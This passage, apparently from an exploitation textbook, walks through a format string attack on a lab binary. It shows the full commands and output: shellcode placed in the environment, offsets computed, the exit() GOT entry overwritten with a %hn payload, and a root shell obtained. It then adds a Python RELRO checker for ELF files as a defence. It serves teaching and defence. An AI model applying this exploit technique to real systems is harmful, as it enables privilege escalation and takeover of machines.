once again for clarity. In the output below, the address of the shellcode (0xbffff9ec)
is written into the address of the exit() function (0x08049784).
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
When fmt_vuln.c tries to call the exit() function, the address of the
exit() function is looked up in the GOT and is jumped to via the PLT. Since
the actual address has been switched with the address for the shellcode in the
environment, a root shell is spawned.
Another advantage of overwriting the GOT is that the GOT entries are
fixed per binary, so a different system with the same binary will have the same
GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities
for exploitation. Basically, any section of memory that is writable and contains
an address that directs the flow of program execution can be targeted.
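The GOT overwrite above only works because the GOT of fmt_vuln is still writable when exit() is called. With full RELRO (a PT_GNU_RELRO segment plus BIND_NOW), the loader resolves every imported symbol at startup and then remaps the GOT read-only, so the two %hn writes would fault instead of redirecting exit(). The checker below is an added example, not code from the book: relro_status() reads the ELF program headers and dynamic section directly, and build_sample() constructs a headers-only ELF32 image for testing rather than a real binary.

```python
import struct

# ELF constants from the System V ABI and the GNU extensions
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474E552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def dynamic_has_bind_now(data, off, size, is64, end):
    """Walk the .dynamic entries and report whether lazy binding is disabled."""
    fmt, step = (end + "qQ", 16) if is64 else (end + "iI", 8)
    for pos in range(off, off + size, step):
        tag, val = struct.unpack_from(fmt, data, pos)
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            return True
    return False


def relro_status(data: bytes) -> str:
    """Return 'none', 'partial' or 'full' RELRO for an ELF image held in memory."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    end = "<" if data[5] == 1 else ">"           # EI_DATA: 1 = little-endian
    if is64:
        phoff, = struct.unpack_from(end + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 54)
    else:
        phoff, = struct.unpack_from(end + "I", data, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", data, 42)
    has_relro = bind_now = False
    for i in range(phnum):
        off = phoff + i * phentsize
        if is64:   # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz
            p_type, _, p_off, _, _, p_filesz = struct.unpack_from(end + "IIQQQQ", data, off)
        else:      # p_type, p_offset, p_vaddr, p_paddr, p_filesz
            p_type, p_off, _, _, p_filesz = struct.unpack_from(end + "IIIII", data, off)
        if p_type == PT_GNU_RELRO:
            has_relro = True                     # GOT region remapped read-only after relocation
        elif p_type == PT_DYNAMIC:
            bind_now = dynamic_has_bind_now(data, p_off, p_filesz, is64, end)
    if not has_relro:
        return "none"
    return "full" if bind_now else "partial"     # partial RELRO leaves .got.plt writable


def build_sample(relro: bool, bind_now: bool) -> bytes:
    """Constructed ELF32 little-endian image (headers + .dynamic only) for testing."""
    dyn = struct.pack("<iI", DT_FLAGS, DF_BIND_NOW if bind_now else 0) + struct.pack("<iI", DT_NULL, 0)
    types = [PT_DYNAMIC] + ([PT_GNU_RELRO] if relro else [])
    phoff, phentsize = 52, 32
    dynoff = phoff + phentsize * len(types)
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9)     # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, phoff, 0, 0, 52, phentsize, len(types), 0, 0, 0)
    phdrs = b"".join(struct.pack("<IIIIIIII", t, dynoff, 0, 0, len(dyn), len(dyn), 6, 4) for t in types)
    return ehdr + phdrs + dyn
```

On a real binary, call relro_status(open(path, "rb").read()); anything other than "full" means a format string write into the GOT, as shown above, would still land.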